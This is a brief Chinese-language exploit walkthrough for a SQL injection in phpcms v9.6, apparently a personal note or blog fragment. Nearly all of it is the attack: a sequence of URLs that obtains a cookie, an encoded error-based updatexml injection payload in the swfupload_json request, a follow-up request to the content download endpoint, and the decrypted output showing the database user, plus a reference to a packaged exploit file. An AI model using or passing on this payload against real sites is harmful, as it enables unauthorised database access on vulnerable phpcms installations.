phpcms SQL 注入

phpcms v9.6 SQL 注入

/index.php?m=wap&c=index&a=init&siteid=1

获取 set-cookie 的值

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26

post 传入 userid_flash 内容是刚刚获取到的 cookie

如果不成功的话 在 header 里面加上

Content-Type: application/x-www-form-urlencoded

复制 set-cookie 里的 json

/index.php?m=content&c=down&a_k=json

解密

root@localhost

v9sql exp

v9sql.zip

0%